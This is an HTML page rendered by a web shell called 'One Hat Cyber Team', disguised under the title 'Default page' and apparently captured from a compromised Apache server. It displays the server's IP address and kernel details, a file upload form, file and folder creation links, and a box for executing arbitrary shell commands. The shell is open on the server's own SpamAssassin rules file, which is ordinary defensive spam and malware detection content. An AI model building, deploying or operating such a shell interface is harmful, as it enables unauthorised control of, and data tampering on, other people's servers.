PK<!DOCTYPE html>
<html lang="en">
  <head>
    <title>Default page</title>
    <link rel="icon" type="image/x-icon" href="//hpanel.hostinger.com/favicons/hostinger.png">
    <meta charset="utf-8">
    <meta content="IE=edge,chrome=1" http-equiv="X-UA-Compatible">
    <meta content="Default page" name="description">
    <meta content="width=device-width, initial-scale=1" name="viewport">
    <link rel="stylesheet" href="//cdn.jsdelivr.net/npm/bootstrap@4.6.0/dist/css/bootstrap.min.css">
    <link rel="stylesheet" href="//cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css">
    <link href="//fonts.googleapis.com/css2?family=Bree+Serif&family=Rock+Salt&display=swap" rel="stylesheet">
    <script src="//unpkg.com/sweetalert/dist/sweetalert.min.js"></script>
    <style>body{color:#000;font-size:0;font-family:'Bree Serif',serif;width:99%;padding:0;margin:7px auto;background-color:black!important}.bg-dark{background-color:black!important}.border{box-shadow:0 0 10px #ff1493;border:2px solid #ff1493!important;border-radius:5px;background:#fff0}.border:hover{box-shadow:0 0 10px #ff1493}.table td{padding:.1rem;box-shadow:inset 0 0 0 1px #ff1493;border-radius:2px}.table thead th{font-family:'Bree Serif',serif;box-shadow:inset 0 0 0 1.5px #ff1493;color:#ff1493;padding:.25rem;border-radius:5px;background:linear-gradient(to bottom,black,rgb(63 63 63 / .5))}.table-hover tbody tr:hover td{background:rgb(63 63 63 / .5)}.table>tbody>tr>*{color:#fff;vertical-align:middle}.form-control{background:transparent!important;color:#fff!important;border-radius:0}.form-control::placeholder{color:#fff;opacity:1}.form-group{margin:.2rem 0}li{font-size:large!important;color:#ff1493!important;list-style:inherit!important}a{color:#fff;text-decoration:none!important}a:hover{color:#ff1493;animation:kedip 1s linear infinite}h5{margin:1.5px 0;color:#ff1493!important;padding:2px}textarea{width:97%;font-size:medium!important;font-family:inherit;height:44vh;padding-left:5px}button,input{border:2px solid #ff1493;border-radius:5px;font-size:15px;color:#fff;line-height:normal;font-family:inherit}button:hover,input:hover{cursor:pointer}.ohct{padding:0 1rem;color:#fff;border:2px solid #ff1493;border-radius:5px;background-color:#fff0;font-family:inherit;font-size:16px}.ohct:hover{color:#ff1493!important}.combet{color:#fff}.combet:hover{color:#ff1493}.p-1{padding:4px}::selection{color:#000;background:silver}.fa{padding:10px;font-size:20px;width:50px;text-align:center;margin:5px;color:#ff1493}.fa:hover{border:2px solid #ff1493}.text-light{color:#f8f9fa!important;font-size:large!important}.kedip{animation:kedip 1s linear infinite}@keyframes kedip{0%,100%{color:#ff1493}50%{color:#fff}}@keyframes rainbowBorder{0%{border-image:linear-gradient(to right,#ff1493,magenta) 1}14%{border-image:linear-gradient(to right,magenta,lime) 1}28%{border-image:linear-gradient(to right,lime,yellow) 1}42%{border-image:linear-gradient(to right,yellow,orange) 1}57%{border-image:linear-gradient(to right,orange,#ff1493) 1}71%{border-image:linear-gradient(to right,#ff1493,pink) 1}85%{border-image:linear-gradient(to right,pink,#ff1493) 1}}.rainbow-border{border:2px solid #ff1493;border-radius:5px!important;animation:rainbowBorder 2s linear infinite}@keyframes rainbowText{0%,100%{color:#ff1493}14%{color:#f0f}28%{color:lime}42%{color:#ff0}57%{color:orange}71%{color:#ff1493}85%{color:pink}}@keyframes rainbowText1{0%,100%{color:pink}14%{color:#ff1493}28%{color:orange}42%{color:#ff0}57%{color:lime}71%{color:#f0f}85%{color:#ff1493}}.rainbow-text{animation:rainbowText 2s infinite;font-weight:700}.rainbow-text1{animation:rainbowText1 2s infinite;font-weight:700}hover{box-shadow:0 0 10px #ff1493}.table td{padding:.1rem;box-shadow:inset 0 0 0 1px #ff1493;border-radius:2px}.table thead th{font-family:'Bree Serif',serif;box-shadow:inset 0 0 0 1.5px #ff1493;color:#ff1493;padding:.25rem;border-radius:5px;background:linear-gradient(to bottom,black,rgb(63 63 63 / .5))}.table-hover tbody tr:hover td{background:rgb(63 63 63 / .5)}.form-control{background:transparent!important;color:#fff!important;border-radius:0}.form-control::placeholder{color:#fff;opacity:1}.ohct{padding:0 1rem;color:#fff;border:2px solid #ff1493;border-radius:5px;background-color:#fff0;font-size:16px}.ohct:hover{color:#ff1493!important}.rainbow-border{border:2px solid #ff1493;border-radius:5px!important;animation:rainbowBorder 2s linear infinite}@keyframes rainbowBorder{0%{border-image:linear-gradient(to right,#ff1493,magenta) 1}14%{border-image:linear-gradient(to right,magenta,lime) 1}28%{border-image:linear-gradient(to right,lime,yellow) 1}42%{border-image:linear-gradient(to right,yellow,orange) 1}57%{border-image:linear-gradient(to right,orange,#ff1493) 1}71%{border-image:linear-gradient(to right,#ff1493,pink) 1}85%{border-image:linear-gradient(to right,pink,#ff1493) 1}}</style>
  </head>
<body>
    <div class="table-responsive text-light rainbow-border" style="text-align: left; padding: 4px;">
        <div style="text-align: center; display: flex; align-items: center; justify-content: center;">
            <a href="//t.me/combetohct" target="_blank" rel="noopener noreferrer">
                <span class="material-symbols-outlined rainbow-text1" style="font-size: 3rem;padding-right: 0.5rem;">&#9885;</span>
            </a>
            <a href="?" style="font-size: 1.5rem; padding: 0.5rem;">
                <span class="rainbow-text" style="font-family: Rock Salt;">One Hat Cyber Team</span>
            </a>
            <a href="mailto:combetohct@yahoo.com">
                <span class="material-symbols-outlined rainbow-text1" style="font-size: 3rem;padding-left: 0.5rem;">&#9885;</span>
            </a>
        </div>
        <ul style="margin: 0; padding-inline-start: 30px;">
        <li>Your IP: <span style="color: white;">198.50.126.145</span></li>
        <li>Server IP: <span style="color: white;">198.50.126.145</span></li>
        <li>Server: <span style="color: white;">Linux servidor.grupodeallus.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64</span></li>
        <li>Server Software: <span style="color: white;">Apache</span></li>
        <li>PHP Version: <span style="color: white;">8.2.29</span></li>
            <li>
                <a href="?p=2f6574632f6d61696c2f7370616d617373617373696e&a=6e657746696c65" class="ohct">Buat File</a> | 
                <a href="?p=2f6574632f6d61696c2f7370616d617373617373696e&a=6e6577446972" class="ohct">Buat Folder</a>
            </li>
        </ul>
        <form action="" method="POST" enctype="multipart/form-data" style="padding: 0.10rem; display: inline-block; margin: 2px 0;">
        <input type="file" name="uploadedfilenya">
        <input type="submit" name="uploadfilenya" value="Upload" class="button ohct">
    </form>
           <form method="POST" style="margin: 2px 0;">
            <div class="form-group">
                <input type="text" name="command" class="border p-1" style="text-align: center; width: 296px; height: 29px;" placeholder="Masukkan Command">
                <button type="submit" name="execute_command" class="ohct">Eksekusi</button>
            </div>
        </form>
            </div>
<div class="table-responsive text-light rainbow-border" style="text-align: left;padding: 4px;margin-bottom: 3px;margin-top: 3px;">
<li>Dir : <span><a href="?p=2f" class="combet">~</a>/<a class="combet" href="?p=2f657463">etc</a>/<a class="combet" href="?p=2f6574632f6d61696c">mail</a>/<a class="combet" href="?p=2f6574632f6d61696c2f7370616d617373617373696e">spamassassin</a>/ 
</span></li></div>
<div class="table-responsive text-light" style="text-align: center;font-family: inherit;font-size: large;">
<h5 class="p-1 rainbow-border">Edit File: nonKAMrules.cf</h5>
    <form method="POST">
        <textarea name="edited_content" cols="30" rows="10" class="form-control rainbow-border">#FROM SA/MD/SARE LISTS - All consider public domain or fair use.

#BY Warren Sallade" <warren.sallade@ewgateway.org> for Drug Spams

#DISABLING DUE TO FALSE POSITIVES 2021-09-14
rawbody   __EWG_BAD34 />\s{0,3}V\s{0,3}</i
rawbody   __EWG_BAD35 />\s{0,3}I\s{0,3}</i
rawbody   __EWG_BAD36 />\s{0,3}A\s{0,3}</i
rawbody   __EWG_BAD37 />\s{0,3}G\s{0,3}</i
rawbody   __EWG_BAD38 />\s{0,3}R\s{0,3}</i
rawbody   __EWG_BAD39 />\s{0,3}A\s{0,3}</i
meta  	 EWG_VIAGRA ((__EWG_BAD34 + __EWG_BAD35 + __EWG_BAD36 + __EWG_BAD37 + __EWG_BAD38 + __EWG_BAD39) > 5) 
describe EWG_VIAGRA Viagra Obfuscation SPAM
score  	 EWG_VIAGRA 1.0

rawbody   __EWG_BAD41 />\s{0,3}C\s{0,3}</i
rawbody   __EWG_BAD42 />\s{0,3}I\s{0,3}</i
rawbody   __EWG_BAD43 />\s{0,3}A\s{0,3}</i
rawbody   __EWG_BAD44 />\s{0,3}L\s{0,3}</i
rawbody   __EWG_BAD45 />\s{0,3}I\s{0,3}</i
rawbody   __EWG_BAD46 />\s{0,3}S\s{0,3}</i
meta   	EWG_CIALIS ((__EWG_BAD41 + __EWG_BAD42 + __EWG_BAD43 + __EWG_BAD44 + __EWG_BAD45 + __EWG_BAD46) > 5)
describe EWG_CIALIS Cialis Obfuscation spam
score   EWG_CIALIS 1.0

rawbody   __EWG_BAD48 />\s{0,3}V\s{0,3}</i
rawbody   __EWG_BAD49 />\s{0,3}A\s{0,3}</i
rawbody   __EWG_BAD50 />\s{0,3}L\s{0,3}</i
rawbody   __EWG_BAD51 />\s{0,3}I\s{0,3}</i
rawbody   __EWG_BAD52 />\s{0,3}U\s{0,3}</i
rawbody   __EWG_BAD53 />\s{0,3}M\s{0,3}</i
meta   	EWG_VALIUM ((__EWG_BAD48 + __EWG_BAD49 + __EWG_BAD50 + __EWG_BAD51 + __EWG_BAD52 + __EWG_BAD53) > 5)
describe EWG_VALIUM Valium Obfuscation Spam
score   EWG_VALIUM 1.000

#FOR CURRENT RND_UC_CHAR SPAMS
header SUBJ_RND_UC_CHAR_L       Subject =~ /\%RND_UC_CHAR/
describe SUBJ_RND_UC_CHAR_L     Subject contains literal RND_UC_CHAR tag
score SUBJ_RND_UC_CHAR_L        5.0

header SUBJ_RND_UC_CHAR         Subject =~ /^Re:\s[A-Z]{2,8},\s[a-z]+\s[a-z]+\s[a-z]+\s*$/
describe SUBJ_RND_UC_CHAR       Subject fits RND_UC_CHAR pattern
score SUBJ_RND_UC_CHAR          1.0

uri         PHARMACOURT_BIZ 	/\b(?:pharmacourt|pharmawarehouse|valuepointmeds)\.biz\b/i
describe    PHARMACOURT_BIZ 	Includes a link to spammer www.pharmacourt.biz
score       PHARMACOURT_BIZ 	3.0

#meta        HABEAS_VIOLATOR_LOCAL   (!HABEAS_VIOLATOR && PHARMACOURT_BIZ && HABEAS_SWE)
#describe    HABEAS_VIOLATOR_LOCAL   Spammer known to abuse Habeas mark
#score       HABEAS_VIOLATOR_LOCAL   16.0

rawbody     UAH_VIAGRA_IMAGE 	/^<center><\!--[a-zA-Z0-9]{10,20}--><a href=.+><img src=.+\/[a-z][1-9]\.gif\" border=0><\/a><\/center>$/i
describe    UAH_VIAGRA_IMAGE	Viagra Image
score	    UAH_VIAGRA_IMAGE    3.0


#INVALID QMAIL 
header  	GERMANSPAM MESSAGEID =~ /^<.*[a-z].*\.qmail\@.*>/
describe        GERMANSPAM Contains German Spam / Invalid Qmail Message ID
score           GERMANSPAM 3.0

#GOOGLE Who really uses the "I'm Feeling Lucky" button anyway? by John Wilcock
uri      local_GOOGLE_LUCKY /(?:\bgoogle\b).+(?:&btnI=)/i
describe local_GOOGLE_LUCKY Redirect through Google Feeling Lucky
score    local_GOOGLE_LUCKY 2.0

#ZD.NET's OPEN REDIR by Raymond Dijkxhoorn
uri PROLO_REDIR_ZDNET_CHECK_1 /http:\/\/.*chkpt.zdnet.com\/chkpt/
score PROLO_REDIR_ZDNET_CHECK_1  8.0
describe PROLO_REDIR_ZDNET_CHECK_1 PROLO_REDIR-ZDNET CHECK_1_2_3, Body

#TINYTEXT by Jonathan Maliepaard <jon@enetworks.co.za>
#describe TINY_TEXT_1              Body includes very small html text 
#rawbody TINY_TEXT_1              /FONT-SIZE: (?:1|1.5|2|2.5|3)px/i
#score TINY_TEXT_1                  1.5

#describe TINY_TEXT_2              Body includes very small html text 
#rawbody TINY_TEXT_2              /FONT-SIZE: (?:1|1.5|2|2.5|3)\;/i
#score TINY_TEXT_2                  1.5


#HABEAS MARK TOO OFTEN FORGED
#REMOVED FOR 3.0SA #score HABEAS_SWE 0.0

#patch to MS Outlook 2003 has changed the headers
#REMOVED FOR 3.0SA #score   FORGED_MUA_OUTLOOK 0.00

#SCORE ADJUSTMENTS
#REMOVED FOR 3.0SA #score   RCVD_IN_NJABL_DIALUP    1.5
#REMOVED FOR 3.0SA #score   RCVD_IN_DYNABLOCK       1.0
#REMOVED FROM RULES score DNS_FROM_OPENWHOIS		2.0

#
# Abusive public hosting Raymond Dijkxhoorn
#

uri PROLO_PUBWEB_UKGEO_CHECK1 /^http:\/\/.*uk\.geocities\.com\//
score PROLO_PUBWEB_UKGEO_CHECK1  5.0
describe PROLO_PUBWEB_UKGEO_CHECK1 PROLO_PUBWEB_UKGEO_CHECK1, Body

uri PROLO_PUBWEB_ITGEO_CHECK1 /^http:\/\/.*it\.geocities\.com\//
score PROLO_PUBWEB_ITGEO_CHECK1  5.0
describe PROLO_PUBWEB_ITGEO_CHECK1 PROLO_PUBWEB_ITGEO_CHECK1, Body

uri PROLO_PUBWEB_WWWGEO_CHECK1 /^http:\/\/.*www\.geocities\.com\//
score PROLO_PUBWEB_WWWGEO_CHECK1  5.0
describe PROLO_PUBWEB_WWWGEO_CHECK1 PROLO_PUBWEB_WWWGEO_CHECK1, Body

uri PROLO_HOSTING_PROHOSTING_CHK1 /^http:\/\/.*prohosting\.com\//
score PROLO_HOSTING_PROHOSTING_CHK1  5.0
describe PROLO_HOSTING_PROHOSTING_CHK1 PROLO_HOSTING_PROHOSTING_CHK1, Body

uri PROLO_HOSTING_XTHOST_CHK1 /^http:\/\/.*xthost\.info\//
score PROLO_HOSTING_XTHOST_CHK1  5.0
describe PROLO_HOSTING_XTHOST_CHK1 PROLO_HOSTING_XTHOST_CHK1, Body

uri PROLO_HOSTING_NET4FREE_CHK1 /^http:\/\/.*net4free\.org\//
score PROLO_HOSTING_NET4FREE_CHK1  5.0
describe PROLO_HOSTING_NET4FREE_CHK1 PROLO_HOSTING_NET4FREE_CHK1, Body

#Raymond's SA Rules for Tripod Spams from Leo
body            PROLO_LEO1              /85\,45|1\,21/
body            PROLO_LEO2              /69\,95|3\,33/
body            PROLO_LEO3              /99\,95|3\,75/
uri             PROLO_LEO4              /http:\/\/.*\.tripod\.com/
meta            PROLO_LEO_M1           (PROLO_LEO1 && PROLO_LEO2 && PROLO_LEO3 && PROLO_LEO4)

score           PROLO_LEO1             0.1
score           PROLO_LEO2             0.1
score           PROLO_LEO3             0.1
score           PROLO_LEO4             0.1
score           PROLO_LEO_M1           8

describe        PROLO_LEO1             Meta Catches all Leo drug variations so far
describe        PROLO_LEO2             Meta Catches all Leo drug variations so far
describe        PROLO_LEO3             Meta Catches all Leo drug variations so far
describe        PROLO_LEO4             Meta to catch Leo now using Tripod
describe        PROLO_LEO_M1           Catches all Leo drug variations so far

#JUNK SCORES TO RECREATE ROUNDING BUG
#score		RDNS_NONE		0.0
#header		TEMP			Received =~ /64.18.1.27/
#score		TEMP			-0.5
#score           KAM_LIVE         0.0

#DFS Rule for Warning: Malformed MIME virus in the wild 10-10-2013
full __RP_ZIP_TYPE /name\s{0,2}=\s{0,2}.{0,80}\.zip/i
full     __RP_EMPTY_CTYPE /Content-Type:\s{0,4};/i
meta	 RP_ZIP_ECTYP __RP_EMPTY_CTYPE && __RP_ZIP_TYPE
describe RP_ZIP_ECTYP Zip file attachment with bogus Content-Type: header
score	 RP_ZIP_ECTYP 15

#AXB TEXTAREA
rawbody 	__AXB_RAW_TXTRO1	/\<textarea name\=\"textmain\" readonly\=\"readonly\" style\=\"width\:/
rawbody         __AXB_RAW_TXTRO2   	/\<textarea readonly\=\"readonly\" name\=\"textmain\" style\=\"width\:/
meta		AXB_RAW_TXTRO		(__AXB_RAW_TXTRO1 + __AXB_RAW_TXTRO2 >= 2)
describe	AXB_RAW_TXTRO		R/O Textarea
score		AXB_RAW_TXTRO		5.0

##########################################################################
# - Find messages with eight or more html break characters in it.
# - From: Kevin Miller <Kevin_Miller@ci.juneau.ak.us>
##########################################################################

# HTML <BR>
rawbody   __CBJ_GiveMeABreak1      /(?:<\/?br ?\/?>[\s\r\n]{0,4}){8}/mi

# NEWLINES - DISABLED
rawbody   __CBJ_GiveMeABreak2      /(?:[\r\n]){8}/mi

# EMPTY TABLE ROWS
rawbody   __CBJ_GiveMeABreak3      /(?:<tr><td><\/td><\/tr>[\r\n]{0,4}){4}/mi

# EMPTY PARAGRAPHS
rawbody   __CBJ_GiveMeABreak4      /(?:<p[^>]*>&nbsp;<\/p>\s*){4}|(?:<div[^>]*>&nbsp;<\/div>\s*){4}/mi

meta      CBJ_GiveMeABreak      (__CBJ_GiveMeABreak1 + __CBJ_GiveMeABreak3 + __CBJ_GiveMeABreak4 >= 1)
describe  CBJ_GiveMeABreak      Messages with consecutive break characters
score     CBJ_GiveMeABreak      1.75

# FIX FOR THE FAILURE THAT IS OUTLOOK
meta  MSGID_MULTIPLE_AT_OUTLOOK  (MSGID_MULTIPLE_AT && __ANY_OUTLOOK_MUA && !MSGID_OUTLOOK_INVALID)
score MSGID_MULTIPLE_AT_OUTLOOK  -1.00
describe MSGID_MULTIPLE_AT_OUTLOOK Undo MSGID_MULTIPLE_AT for Outlook MUAs that fail at standards

# SPAM THAT SAYS IT IS SPAM
header   AXB_X_FF_SEZ_S X-Forefront-Antispam-Report =~ /^SFV\:SPM/
describe AXB_X_FF_SEZ_S Forefront says this is spam
score    AXB_X_FF_SEZ_S 1.5

# HACKED WORDPRESS SITES
uri        __RP_D_00069_1 /\/wp-content\/(?:plugins|themes)\/.*\.php/is
uri        __RP_D_00069_2 /\/wp-includes\/.*\.php/is
meta       RP_D_00069 __RP_D_00069_1 || __RP_D_00069_2
describe   RP_D_00069 Contains URL that may point to hacked WordPress site
score      RP_D_00069 1.2

#lowering score on this rule from 1.5 to 1.2 and the stock URI_WP_HACKED_2 to 2.1
score	   URI_WP_HACKED_2   2.1

# from John Hardin <jhardin@impsec.org>
# reported on users list 09/2014 George Johnson <georgejohnson@talaya.net>
header    __RAND_HEADER                ALL =~ /^(?!Accept-Language|Authentication-Results|Content-|DomainKey-Signature|DKIM-|List-|MIME-|Received-SPF|Return-Path|Thread-|User-Agent)(?:[a-z]{4,}-[a-z]{3,}|[a-z]{3,}-[a-z]{5,}):\s+(?:\d{3,}[-\.][0-9a-f]{6,}|\d{6,}(?:[-\.]\d{2,5})?|[0-9a-f]{30,})$/ism
tflags    __RAND_HEADER                multiple maxhits=5
meta      RAND_HEADER_MANY             __RAND_HEADER > 4
describe  RAND_HEADER_MANY             Many random gibberish message headers
score     RAND_HEADER_MANY             1.500   # limit


uri    AXB_URI_MLW_DROPBOX    /\/(dropbox|googlebox)\/(document|doc|invoice)\.php$/
score  AXB_URI_MLW_DROPBOX    100

# from axb - the .link tld is completely useless and spam-ridden
# FP from 2017-09-12 removed
if (version >= 3.004000)
  #blacklist_uri_host link
endif

# COSTCO SPAM RULE FROM DIANNE F SKOLL
uri        __RP_D_00081_1 /\.php\?(?:dp|k|c|t)=[\/A-Za-z0-9=+]{25}/
header     __RP_D_00081_2 Subject =~ /\b(?:order|buying)\b/i
meta       RP_D_00081 __RP_D_00081_1 && __RP_D_00081_2
describe   RP_D_00081 Link to malware
score      RP_D_00081 3.5

# MORE AXB - PENDING BUG 4691
#rawbody  MINIMAL_PAGE_128 	/\<HTML\>\<BODY\>\<\/BODY\>\<\/HTML\>/
#range    MINIMAL_PAGE_128        byte 0:128
#score    MINIMAL_PAGE_128        5.0

#fast_body       PILLS_VIAGRA     /Blue pill and all popular Meds/
#score           PILLS_VIAGRA     5.0

#NOTE 53548 - TESTING JUNKEMAIL FILTER CHECK - TESTING WITH RULES 1/2 OF DOCUMENTED
header __RCVD_IN_HOSTKARMA eval:check_rbl('HOSTKARMA-lastexternal','hostkarma.junkemailfilter.com.')
describe __RCVD_IN_HOSTKARMA Sender listed in JunkEmailFilter
tflags __RCVD_IN_HOSTKARMA net
 
header RCVD_IN_HOSTKARMA_W eval:check_rbl_sub('HOSTKARMA-lastexternal', '127.0.0.1')
describe RCVD_IN_HOSTKARMA_W Sender listed in HOSTKARMA-WHITE
tflags RCVD_IN_HOSTKARMA_W net nice
score RCVD_IN_HOSTKARMA_W -2.5
 
header RCVD_IN_HOSTKARMA_BL eval:check_rbl_sub('HOSTKARMA-lastexternal', '127.0.0.2')
describe RCVD_IN_HOSTKARMA_BL Sender listed in HOSTKARMA-BLACK
tflags RCVD_IN_HOSTKARMA_BL net
score RCVD_IN_HOSTKARMA_BL 1.5
 
header RCVD_IN_HOSTKARMA_BR eval:check_rbl_sub('HOSTKARMA-lastexternal', '127.0.0.4')
describe RCVD_IN_HOSTKARMA_BR Sender listed in HOSTKARMA-BROWN
tflags RCVD_IN_HOSTKARMA_BR net
score RCVD_IN_HOSTKARMA_BR 0.5

#Steadramon's bogus SPF rules  - https://issues.apache.org/SpamAssassin/show_bug.cgi?id=7099 
ifplugin Mail::SpamAssassin::Plugin::AskDNS
  askdns PDS_SPF_ALL _SENDERDOMAIN_ TXT /^v=spf1 .+\+all$/
  describe PDS_SPF_ALL SPF set to +all!
  score PDS_SPF_ALL 4.5

  askdns PDS_SPF_NONE _SENDERDOMAIN_ TXT /^v=spf1 \-all$/
  describe PDS_SPF_NONE No IP is supposed to send email for this domain!
  score PDS_SPF_NONE 3.5

  askdns PDS_SPF_ONLYALL _SENDERDOMAIN_ TXT /^v=spf1 \+all$/
  describe PDS_SPF_ONLYALL SPF only +all - very lazy
  score PDS_SPF_ONLYALL 4.5
endif

# FROM DFS
ifplugin Mail::SpamAssassin::Plugin::MIMEHeader
mimeheader RP_D_00086 Content-Disposition =~ /SecureMessage\.chm/
score      RP_D_00086 50
describe   RP_D_00086 SecureMessage.chm malware
endif

# FROM BENNY PEDERSEN
# sig of fill space to possible drop scanning if clients have very low
# size on how much thay send to spamassassin in size

rawbody POISEN_SPAM_PILL_1 /\ \/[a-zA-Z0-9]{5}/i
tflags POISEN_SPAM_PILL_1 multiple maxhits=1
describe POISEN_SPAM_PILL_1 random spam to be learned in bayes
score POISEN_SPAM_PILL_1 0.1 0.1 0.1 0.1

rawbody POISEN_SPAM_PILL_2 /\ \/\/[a-zA-Z0-9]{5}/i
tflags POISEN_SPAM_PILL_2 multiple maxhits=1
describe POISEN_SPAM_PILL_2 random spam to be learned in bayes
score POISEN_SPAM_PILL_2 0.1 0.1 0.1 0.1

# lets check above is in body :=)

body POISEN_SPAM_PILL_3 /\ \/[a-zA-Z0-9]{5}/i
tflags POISEN_SPAM_PILL_3 multiple maxhits=1
describe POISEN_SPAM_PILL_3 random spam to be learned in bayes
score POISEN_SPAM_PILL_3 0.1 0.1 0.1 0.1

body POISEN_SPAM_PILL_4 /\ \/\/[a-zA-Z0-9]{5}/i
tflags POISEN_SPAM_PILL_4 multiple maxhits=1
describe POISEN_SPAM_PILL_4 random spam to be learned in bayes
score POISEN_SPAM_PILL_4 0.1 0.1 0.1 0.1

# meta is now

meta POISEN_SPAM_PILL ((POISEN_SPAM_PILL_1 || POISEN_SPAM_PILL_2) && (!POISEN_SPAM_PILL_3 || !POISEN_SPAM_PILL_4))
describe POISEN_SPAM_PILL Meta: its spam
score POISEN_SPAM_PILL 0.1 0.1 0.1 0.1

#HENRIK KROHNS DEPENDENCY ISSUES FROM OLD SANDBOX
ifplugin Mail::SpamAssassin::Plugin::MIMEHeader
  mimeheader      __HK_SPAMMY_CTFN        Content-Type =~ /name=.*?(?:lot(?:eri[ej]|t(?:ery|o))|award|prize|winn(?:er|ing)|microsoft|congrat|urgent)/mi
  mimeheader      __HK_SPAMMY_CDFN        Content-Disposition =~ /name=.*?(?:lot(?:eri[ej]|t(?:ery|o))|award|prize|winn(?:er|ing)|microsoft|congrat|urgent)/mi
  meta            HK_SPAMMY_FILENAME      __HK_SPAMMY_CTFN || __HK_SPAMMY_CDFN
  score           HK_SPAMMY_FILENAME      0.5
  describe        HK_SPAMMY_FILENAME      Content Type or Disposition is Spammy
endif

#KHOPESH DEPENDENCY ISSUES FROM OLD SANDBOX
meta     MALFORMED_FREEMAIL     (MISSING_HEADERS||__HDRS_LCASE) && FREEMAIL_FROM
describe MALFORMED_FREEMAIL     Bad headers on message from free email service
score   MALFORMED_FREEMAIL     0.1

#DAVE JONES / ENA OK TO ADD TO SA DEFAULT IF PROVEN WORTHY
header          ENA_SUBJ_IS_SPACE       Subject =~ /^ $/
describe        ENA_SUBJ_IS_SPACE       Subject is a space
score           ENA_SUBJ_IS_SPACE       1.2
#Lowered score from 3.2 for testing 9/19

header          ENA_SUBJ_ONLY_SPACES    Subject =~ /^\s\s+$/
describe        ENA_SUBJ_ONLY_SPACES    Subject is only spaces commonly used by spammers to get around subject checks
score           ENA_SUBJ_ONLY_SPACES    0.2
#Lowered score from 2.2 for testing 9/19

header          ENA_SUBJ_ONLY_FWD       Subject =~ /(^Fw:\s+$|^Fw\s+$|^Fwd:\s+$|^Fwd\s+$|^Fwd: \(\d\)$|^Fwd: \[\d\]$)/i
describe        ENA_SUBJ_ONLY_FWD       Subject is only "Fwd:"
score           ENA_SUBJ_ONLY_FWD       2.2

header          ENA_SUBJ_ONLY_RE        Subject =~ /(^Re:\s+$|^Re\s+$|^Re: \(\d\)$|^Re: \[\d\]$)/i
describe        ENA_SUBJ_ONLY_RE        Subject is only "Re:"
score           ENA_SUBJ_ONLY_RE        2.2

header          ENA_SUBJ_LONG_WORD      Subject =~ /\b[^[:space:][:punct:]]{30}/
describe        ENA_SUBJ_LONG_WORD      Subject has a very long word
score           ENA_SUBJ_LONG_WORD      0.75

header          ENA_SUBJ_ODD_CASE       Subject =~ /(?:[[:lower:]][[:upper:]].{0,15}){3}/
describe        ENA_SUBJ_ODD_CASE       Subject has odd case
score           ENA_SUBJ_ODD_CASE       1.2


# David Jones <djones@ena.com>, SA users list, 2 Oct 2017

#header   USERS_FROM_SPOOF_EMAIL_DISPLAY  From =~ /\@[a-z_]+?\.[a-z]{2,3} \</i
#score    USERS_FROM_SPOOF_EMAIL_DISPLAY  0.1

#describe USERS_FROM_SPOOF_EMAIL_DISPLAY  From trying to spoof an email address in the display name

# RW <rwmaillists@googlemail.com>, SA users list, 5 Oct 2017

#header   USERS_FROM_ADDR_SPACE  From:addr =~ /\s/
#score    USERS_FROM_ADDR_SPACE  0.1


# Note 56133, SA bug 5561
#score FORGED_YAHOO_RCVD 0


# RW <rwmaillists@googlemail.com>, SA users list, 26 Apr 2019
header    BOGUS_MIME_VERSION  MIME-Version =~ /^(?!.*\b1\.0\b).+/
score     BOGUS_MIME_VERSION  0.5
describe  BOGUS_MIME_VERSION  bogus MIME-Version header

# by Paul Stead <paul.stead@zeninternet.co.uk>
if (version >= 3.004000)
ifplugin Mail::SpamAssassin::Plugin::FromNameSpoof
  # skip message signed by these DKIM senders
  fns_ignore_dkim linkedin.com googlegroups.com yahoogroups.com yahoogroups.de

  # skip messages with one or more of these headers
  fns_ignore_headers List-Id List-Post Mailing-List X-Forwarded-For

  # group similar domains to one name
  fns_add_addrlist   (GMAIL)  *@gmail.com *@googlemail.com

  # From:name and From:address don't match and owners differ
  header   __PLUGIN_FROMNAME_SPOOF eval:check_fromname_spoof()

  # From:name address matches To:address
  header   __PLUGIN_FROMNAME_EQUALS_TO eval:check_fromname_equals_to()

  meta     PDS_FROMNAME_SPOOFED_EMAIL  (__PLUGIN_FROMNAME_SPOOF && !__VIA_ML && !__VIA_RESIGNER && !__RP_MATCHES_RCVD)
  describe PDS_FROMNAME_SPOOFED_EMAIL From:name doesn't match From:address
  score    PDS_FROMNAME_SPOOFED_EMAIL 0.2

endif
endif

# by Pedro David Marcos
ifplugin Mail::SpamAssassin::Plugin::AskDNS
  ifplugin Mail::SpamAssassin::Plugin::URIDetail
    uri_detail      PDM_URI_GOOGLEAPIS          text =~ /check|click|update|renew|preview/i         cleaned =~ /\.googleapis\./i
    describe        PDM_URI_GOOGLEAPIS          Rule to look for spammy Google API usage
    score           PDM_URI_GOOGLEAPIS          3.0
  endif
endif

# by Bill Cole
describe HTML_BADATTR Illegal char in HTML attribute name
rawbody  HTML_BADATTR /<[a-z]{1,10}\s[^>]{1,80}\/(src|href)\s*\=/
score    HTML_BADATTR 1.0

#RECOMMENDED BY Raymond Dijkxhoorn for SURBL to block abuses on these pages
util_rb_3tld    ct.sendgrid.net
util_rb_2tld    page.link

</textarea>
        <button type="submit" name="save_edit" class="ohct" style="margin-top: .2rem;">Simpan</button>
    </form>
</div>
 
</div>
<script src="//code.jquery.com/jquery-3.5.1.slim.min.js"></script>
<script src="//cdn.jsdelivr.net/npm/bootstrap@4.6.0/dist/js/bootstrap.bundle.min.js" ></script>
<script src="//cdn.jsdelivr.net/npm/bs-custom-file-input/dist/bs-custom-file-input.min.js"></script>
<script type="text/javascript">eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('E.n();$(\'[2-m="4"]\').4();$(".l").k(j(e){e.g();h 0=$(6).5("2-0");c({b:"a",9:"o i q?",w:"D "+0+" p C B",A:7,z:7,}).y((8)=>{r(8){x 1=$(6).5("3")+"&t="+((0=="v")?"d":"f");u.s.3=1}})});',41,41,'type|buildURL|data|href|tooltip|attr|this|true|willDelete|title|warning|icon|swal||||preventDefault|let|you|function|click|delete|toggle|init|Are|will|sure|if|location||document|folder|text|const|then|dangerMode|buttons|deleted|be|This|bsCustomFileInput'.split('|'),0,{}))</script>
</body>
</html>